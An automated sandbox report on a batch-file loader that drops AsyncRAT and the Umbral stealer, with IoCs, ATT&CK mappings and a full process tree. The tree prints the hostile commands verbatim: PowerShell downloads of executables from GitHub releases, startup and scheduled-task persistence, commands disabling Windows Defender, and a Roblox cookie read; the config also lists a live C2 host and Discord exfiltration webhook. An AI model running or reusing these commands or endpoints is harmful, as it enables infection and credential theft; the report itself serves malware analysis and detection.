asyncrat | 504e74f223f13c996066449c7f279eb32a61f80f80c9e87d31cfdca6fee7373f

Analysis

max time kernel
870s
max time network
871s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
25-11-2024 12:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Loader.bat
Size

1KB
MD5

84d66a793f6d1f8fb1f4726ee735f55e
SHA1

db7f145a9685a3911f02bbc61a02546da06e68d9
SHA256

504e74f223f13c996066449c7f279eb32a61f80f80c9e87d31cfdca6fee7373f
SHA512

ab172682c693815c9bb902f395632785e0b24981f05eef61244c4311aabb79f94a4af9e1dc978ab2f3caa5b4db1b5cdd2ad896a61d4d8bb747750d702f1b907e

Score

10^/10

asyncrat umbral default discovery execution rat spyware stealer

Malware Config

Extracted

Family

asyncrat

Botnet

Default

technical-southwest.gl.at.ply.gg:58694

Attributes

delay
1
install
true
install_file
WINDOWS.exe
install_folder
%AppData%

aes.plain

Extracted

Family

umbral

https://discordapp.com/api/webhooks/1310580388070031360/HcT5cAwFckSLk1OKu346uVDw7gzPyJJvcWmU8BKJrBQSUsE3Q1GCqDtVn5MK3JlldJBn

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0008000000023bbd-63.dat	family_umbral
behavioral1/memory/1012-70-0x000001AB9CC90000-0x000001AB9CCD0000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x000b000000023b9a-30.dat	family_asyncrat

Blocklisted process makes network request 4 IoCs

flow	pid	Process
8	2836	powershell.exe
12	2836	powershell.exe
25	2948	powershell.exe
26	2948	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
972	powershell.exe
2232	powershell.exe
4232	powershell.exe
4532	powershell.exe
2336	powershell.exe
660	powershell.exe
2836	powershell.exe
2948	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Loader.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	output.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\output.lnk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Loader.lnk	powershell.exe

Executes dropped EXE 3 IoCs

pid	Process
3172	output.exe
1012	Loader.exe
780	WINDOWS.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
40	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4548	cmd.exe
404	PING.EXE

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1112	timeout.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1084	wmic.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
404	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
752	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2836	powershell.exe
2836	powershell.exe
972	powershell.exe
972	powershell.exe
2948	powershell.exe
2948	powershell.exe
3172	output.exe
3172	output.exe
3172	output.exe
3172	output.exe
3172	output.exe
3172	output.exe
3172	output.exe
3172	output.exe
3172	output.exe
3172	output.exe
3172	output.exe
3172	output.exe
3172	output.exe
3172	output.exe
3172	output.exe
3172	output.exe
3172	output.exe
3172	output.exe
3172	output.exe
3172	output.exe
3172	output.exe
3172	output.exe
3172	output.exe
3172	output.exe
3172	output.exe
3172	output.exe
3172	output.exe
3172	output.exe
3172	output.exe
3172	output.exe
3172	output.exe
3172	output.exe
3172	output.exe
2232	powershell.exe
2232	powershell.exe
4232	powershell.exe
4232	powershell.exe
4532	powershell.exe
4532	powershell.exe
780	WINDOWS.exe
780	WINDOWS.exe
780	WINDOWS.exe
780	WINDOWS.exe
780	WINDOWS.exe
780	WINDOWS.exe
780	WINDOWS.exe
780	WINDOWS.exe
780	WINDOWS.exe
780	WINDOWS.exe
780	WINDOWS.exe
780	WINDOWS.exe
780	WINDOWS.exe
780	WINDOWS.exe
780	WINDOWS.exe
780	WINDOWS.exe
780	WINDOWS.exe
780	WINDOWS.exe
2336	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2836	powershell.exe
Token: SeDebugPrivilege	972	powershell.exe
Token: SeDebugPrivilege	2948	powershell.exe
Token: SeDebugPrivilege	3172	output.exe
Token: SeDebugPrivilege	3172	output.exe
Token: SeDebugPrivilege	2232	powershell.exe
Token: SeDebugPrivilege	1012	Loader.exe
Token: SeDebugPrivilege	4232	powershell.exe
Token: SeDebugPrivilege	4532	powershell.exe
Token: SeDebugPrivilege	780	WINDOWS.exe
Token: SeDebugPrivilege	780	WINDOWS.exe
Token: SeDebugPrivilege	2336	powershell.exe
Token: SeDebugPrivilege	368	powershell.exe
Token: SeIncreaseQuotaPrivilege	400	wmic.exe
Token: SeSecurityPrivilege	400	wmic.exe
Token: SeTakeOwnershipPrivilege	400	wmic.exe
Token: SeLoadDriverPrivilege	400	wmic.exe
Token: SeSystemProfilePrivilege	400	wmic.exe
Token: SeSystemtimePrivilege	400	wmic.exe
Token: SeProfSingleProcessPrivilege	400	wmic.exe
Token: SeIncBasePriorityPrivilege	400	wmic.exe
Token: SeCreatePagefilePrivilege	400	wmic.exe
Token: SeBackupPrivilege	400	wmic.exe
Token: SeRestorePrivilege	400	wmic.exe
Token: SeShutdownPrivilege	400	wmic.exe
Token: SeDebugPrivilege	400	wmic.exe
Token: SeSystemEnvironmentPrivilege	400	wmic.exe
Token: SeRemoteShutdownPrivilege	400	wmic.exe
Token: SeUndockPrivilege	400	wmic.exe
Token: SeManageVolumePrivilege	400	wmic.exe
Token: 33	400	wmic.exe
Token: 34	400	wmic.exe
Token: 35	400	wmic.exe
Token: 36	400	wmic.exe
Token: SeIncreaseQuotaPrivilege	400	wmic.exe
Token: SeSecurityPrivilege	400	wmic.exe
Token: SeTakeOwnershipPrivilege	400	wmic.exe
Token: SeLoadDriverPrivilege	400	wmic.exe
Token: SeSystemProfilePrivilege	400	wmic.exe
Token: SeSystemtimePrivilege	400	wmic.exe
Token: SeProfSingleProcessPrivilege	400	wmic.exe
Token: SeIncBasePriorityPrivilege	400	wmic.exe
Token: SeCreatePagefilePrivilege	400	wmic.exe
Token: SeBackupPrivilege	400	wmic.exe
Token: SeRestorePrivilege	400	wmic.exe
Token: SeShutdownPrivilege	400	wmic.exe
Token: SeDebugPrivilege	400	wmic.exe
Token: SeSystemEnvironmentPrivilege	400	wmic.exe
Token: SeRemoteShutdownPrivilege	400	wmic.exe
Token: SeUndockPrivilege	400	wmic.exe
Token: SeManageVolumePrivilege	400	wmic.exe
Token: 33	400	wmic.exe
Token: 34	400	wmic.exe
Token: 35	400	wmic.exe
Token: 36	400	wmic.exe
Token: SeIncreaseQuotaPrivilege	3612	wmic.exe
Token: SeSecurityPrivilege	3612	wmic.exe
Token: SeTakeOwnershipPrivilege	3612	wmic.exe
Token: SeLoadDriverPrivilege	3612	wmic.exe
Token: SeSystemProfilePrivilege	3612	wmic.exe
Token: SeSystemtimePrivilege	3612	wmic.exe
Token: SeProfSingleProcessPrivilege	3612	wmic.exe
Token: SeIncBasePriorityPrivilege	3612	wmic.exe
Token: SeCreatePagefilePrivilege	3612	wmic.exe

Suspicious use of WriteProcessMemory 46 IoCs

description	pid	Process	procid_target
PID 3832 wrote to memory of 2836	3832	cmd.exe	83
PID 3832 wrote to memory of 2836	3832	cmd.exe	83
PID 3832 wrote to memory of 972	3832	cmd.exe	84
PID 3832 wrote to memory of 972	3832	cmd.exe	84
PID 3832 wrote to memory of 3172	3832	cmd.exe	89
PID 3832 wrote to memory of 3172	3832	cmd.exe	89
PID 3832 wrote to memory of 2948	3832	cmd.exe	90
PID 3832 wrote to memory of 2948	3832	cmd.exe	90
PID 3172 wrote to memory of 4296	3172	output.exe	93
PID 3172 wrote to memory of 4296	3172	output.exe	93
PID 3172 wrote to memory of 660	3172	output.exe	95
PID 3172 wrote to memory of 660	3172	output.exe	95
PID 660 wrote to memory of 1112	660	cmd.exe	97
PID 660 wrote to memory of 1112	660	cmd.exe	97
PID 4296 wrote to memory of 752	4296	cmd.exe	98
PID 4296 wrote to memory of 752	4296	cmd.exe	98
PID 3832 wrote to memory of 2232	3832	cmd.exe	100
PID 3832 wrote to memory of 2232	3832	cmd.exe	100
PID 3832 wrote to memory of 1012	3832	cmd.exe	101
PID 3832 wrote to memory of 1012	3832	cmd.exe	101
PID 660 wrote to memory of 780	660	cmd.exe	102
PID 660 wrote to memory of 780	660	cmd.exe	102
PID 1012 wrote to memory of 2284	1012	Loader.exe	103
PID 1012 wrote to memory of 2284	1012	Loader.exe	103
PID 1012 wrote to memory of 4232	1012	Loader.exe	105
PID 1012 wrote to memory of 4232	1012	Loader.exe	105
PID 1012 wrote to memory of 4532	1012	Loader.exe	107
PID 1012 wrote to memory of 4532	1012	Loader.exe	107
PID 1012 wrote to memory of 2336	1012	Loader.exe	111
PID 1012 wrote to memory of 2336	1012	Loader.exe	111
PID 1012 wrote to memory of 368	1012	Loader.exe	113
PID 1012 wrote to memory of 368	1012	Loader.exe	113
PID 1012 wrote to memory of 400	1012	Loader.exe	115
PID 1012 wrote to memory of 400	1012	Loader.exe	115
PID 1012 wrote to memory of 3612	1012	Loader.exe	117
PID 1012 wrote to memory of 3612	1012	Loader.exe	117
PID 1012 wrote to memory of 1112	1012	Loader.exe	119
PID 1012 wrote to memory of 1112	1012	Loader.exe	119
PID 1012 wrote to memory of 660	1012	Loader.exe	121
PID 1012 wrote to memory of 660	1012	Loader.exe	121
PID 1012 wrote to memory of 1084	1012	Loader.exe	123
PID 1012 wrote to memory of 1084	1012	Loader.exe	123
PID 1012 wrote to memory of 4548	1012	Loader.exe	125
PID 1012 wrote to memory of 4548	1012	Loader.exe	125
PID 4548 wrote to memory of 404	4548	cmd.exe	127
PID 4548 wrote to memory of 404	4548	cmd.exe	127

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2284	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loader.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3832
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest -Uri https://github.com/Realmastercoder69/uu/releases/download/dss/Loader.exe -OutFile C:\Users\Admin\Desktop\output.exe -ErrorAction SilentlyContinue"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2836
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$WScriptShell = New-Object -ComObject WScript.Shell; $shortcut1 = $WScriptShell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\output.lnk'); $shortcut1.TargetPath = 'C:\Users\Admin\Desktop\output.exe'; $shortcut1.Save()"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops startup file
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:972
- C:\Users\Admin\Desktop\output.exe
  C:\Users\Admin\Desktop\output.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3172
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"' & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4296
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"'
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpCDFE.tmp.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:660
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:1112
  - - C:\Users\Admin\AppData\Roaming\WINDOWS.exe
      "C:\Users\Admin\AppData\Roaming\WINDOWS.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:780
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest -Uri https://github.com/Realmastercoder69/dsafffffffff/releases/download/dasa/saloader.exe -OutFile C:\Users\Admin\Desktop\Loader.exe -ErrorAction SilentlyContinue"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2948
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$WScriptShell = New-Object -ComObject WScript.Shell; $shortcut2 = $WScriptShell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Loader.lnk'); $shortcut2.TargetPath = 'C:\Users\Admin\Desktop\Loader.exe'; $shortcut2.Save()"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops startup file
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2232
- C:\Users\Admin\Desktop\Loader.exe
  C:\Users\Admin\Desktop\Loader.exe
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1012
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\Desktop\Loader.exe"
    3⤵
    - Views/modifies file attributes
    PID:2284
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Loader.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4232
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4532
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2336
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:368
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:400
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3612
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:1112
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:660
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1084
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Desktop\Loader.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of WriteProcessMemory
    PID:4548
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:404

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
dcd83f3a9bd52a6c0821eb961e87f0b9

SHA1
553ced8b5bdca9bf3379571948efe530628e78ea

SHA256
da3851259b355076f41331c3864fdcd7688b05ca312f6fcdb420f710ed7cfeaa

SHA512
fd76f13f1c8f1e73be04a615c9b010dde5cbf889642d187d410db32d4fdda9d0e994654fa468643ed8fe7563c07a8d1df30b2f5b26856946ed9b2d18d10a4fa5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b0a78e60bfb279d18fd3d6e7a67411f5

SHA1
9344fe3654a14bc66afb9dc6ea215fabfbe5c906

SHA256
a28890c82033d3deaf5770ecd1b0239c77321acc93704b1d4b1e167b91e30aeb

SHA512
9548be23bec645cd705482f78d43b63659e38cf879c34f7071f42fd86ee02039379a5e92fbe0f1c74c12aaebabdd8002f57eba111d3e855cbd0c89a110e346f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
77fad1dec6867fb7dd395c25c46d8ae5

SHA1
abfecfd6c63bb35ec88d98ef210adefc139d793e

SHA256
02b0ab469998ac630b421de245ee243599422e7f2c2f9714085fc5b837891784

SHA512
ac8d9d660992d076e46ffdb7422d4916789a7ca2f5737c711449f518745dee197ed1c08e50f81f92cb7d2d1ea94fe024e77a8295e1be05c5a49a0fd7495776d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c20ac38ae3022e305b8752804aadf486

SHA1
4c144d6cfafb5c37ab4810ff3c1744df81493cdb

SHA256
03cba7e903a418a3966af1dc0debfb5fcfb2ac6d372ec48cb1b93c23e0fd1caf

SHA512
c9def9e5cd09d19b8b47a3f4c61893da715a6ba4b9933c885386d0425ee4ccc30d75eac1097511619d4e6259a46581f803fb38f78a15339391e4e78b0b6153e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0d68ba3a1f3a0d52f60add29746c7d1f

SHA1
338da2ff46fd31d51130eb1c6388c307337ddc70

SHA256
ba94d0bf724cd9dffc8c938c4c0ef185789370ae1d7d5cca2c3aacf81e4c6a70

SHA512
496c3574c5a65e8daffe3ffdd6ab2dc0bd64035364c1bdb8c3a675f6190af53576bc881e49e1e79fb07c36ef3fcecbbde7ebbec9dcc695c98981116ba2624cc5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2419d068e09423d5e7edec9bb8010870

SHA1
445b4a6ebefa37ee91ff5a18a3b8e6ae6af40fba

SHA256
d308e6cb382517e03b6773d345b2e68e57fe80ce636901ab95da87ba29d6c0ac

SHA512
053cb92ad73f842f22200dd39082a22474277816b1de63a722b881225218849e1d5038fe3caec8f2067c5e6ab593917d1ad7278038c154077e7e2b14d72f3264

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3bc3d3f73fc81d9d1a8a4b17192aa35a

SHA1
d017d278395183edb0db4a301dacc57285d59a5c

SHA256
934a29e6c90140621824a91cd5d60a3c42a62207ad3fa4d6581ad2a6310cf614

SHA512
bf8c596f6c109bd6d932696c65c46f054033ffd3e39433ac69a3d6e91a0c28dfd73ca5a75a206ac1707a2b6cb57ba2b44ee8fadca2aad584439f280617d42134

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
bcc5263a9f80170c1204a8b086681657

SHA1
26d32ba23717e860f005c9efbb0810978321ac41

SHA256
eadf1bd4601c7a7084f4874e6769f325c9bbc91c4e7509cde5b46be24f4a3e44

SHA512
e2c7fb7baef5d1e55db07c489f2d8993a1b5adde965a603a7eb91d9ffc0d04944d37bb313ee73196e921975da056c3efb7e8603bc3033285801ac0da8715a19f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_si2uug1u.5tb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpCDFE.tmp.bat

Filesize
151B

MD5
8834b543fb391f945beab10071f6e569

SHA1
c162b9d37064f89b0abcf2c4c8655654ace85b31

SHA256
595d874dad985ba4271e78ad0bb602cf330a88e6459ea35a17b0974381b22202

SHA512
88211b7ff14776d838a4e60423a92da096ad5e99da39f27f13d4ff7eeaf5e377cccb12c373fb80caa256fce58607bc66fdc35236a6d5ef3fa15cdd8939772469

Download Submit
C:\Users\Admin\Desktop\Loader.exe

Filesize
229KB

MD5
1e10af7811808fc24065f18535cf1220

SHA1
65995bcb862aa66988e1bb0dbff75dcac9b400c7

SHA256
e07fd0ac793b06603be164c9ee73465af512cf17bed07614cbcd2a8410f04eed

SHA512
f1c623918a3701254805e7648d671b316446a0f98637d3de62d44331cf91502afb57ccb762472491bc4ac037fbf5f7b624eb9d39092b3be0b2ed84da6f3acadc

Download Submit
C:\Users\Admin\Desktop\output.exe

Filesize
63KB

MD5
7ceb11ebb7a55e33a82bc3b66f554e79

SHA1
8dfd574ad06ded662d92d81b72f14c1914ac45b5

SHA256
aea3e89e45a33441bcd06c990282f8601eb960a641c611222dce2fe09685e603

SHA512
d8cd7af50996015163c8926fc7b6df6a6e2c0b3f6c8fcff37cad5b72fed115f7134723d99f61a20576b83e67107a3a410f5ef2312191446b3d0759cb739e6ccd

Download Submit
memory/660-152-0x000002486D9A0000-0x000002486D9E8000-memory.dmp

Filesize
288KB

Download
memory/660-153-0x000002486DB10000-0x000002486DD2C000-memory.dmp

Filesize
2.1MB

Download
memory/780-159-0x0000000002460000-0x0000000002494000-memory.dmp

Filesize
208KB

Download
memory/972-18-0x00007FFD9C520000-0x00007FFD9CFE1000-memory.dmp

Filesize
10.8MB

Download
memory/972-33-0x00007FFD9C520000-0x00007FFD9CFE1000-memory.dmp

Filesize
10.8MB

Download
memory/972-19-0x00007FFD9C520000-0x00007FFD9CFE1000-memory.dmp

Filesize
10.8MB

Download
memory/1012-95-0x000001ABB71A0000-0x000001ABB7216000-memory.dmp

Filesize
472KB

Download
memory/1012-70-0x000001AB9CC90000-0x000001AB9CCD0000-memory.dmp

Filesize
256KB

Download
memory/1012-96-0x000001AB9EA70000-0x000001AB9EAC0000-memory.dmp

Filesize
320KB

Download
memory/1012-97-0x000001AB9EA30000-0x000001AB9EA4E000-memory.dmp

Filesize
120KB

Download
memory/1012-136-0x000001AB9EAC0000-0x000001AB9EACA000-memory.dmp

Filesize
40KB

Download
memory/1012-137-0x000001ABB7600000-0x000001ABB7612000-memory.dmp

Filesize
72KB

Download
memory/2836-0-0x00007FFD9C523000-0x00007FFD9C525000-memory.dmp

Filesize
8KB

Download
memory/2836-16-0x00007FFD9C520000-0x00007FFD9CFE1000-memory.dmp

Filesize
10.8MB

Download
memory/2836-12-0x00007FFD9C520000-0x00007FFD9CFE1000-memory.dmp

Filesize
10.8MB

Download
memory/2836-11-0x00007FFD9C520000-0x00007FFD9CFE1000-memory.dmp

Filesize
10.8MB

Download
memory/2836-1-0x000001CE2A7D0000-0x000001CE2A7F2000-memory.dmp

Filesize
136KB

Download
memory/3172-35-0x0000000000F90000-0x0000000000FA6000-memory.dmp

Filesize
88KB

Download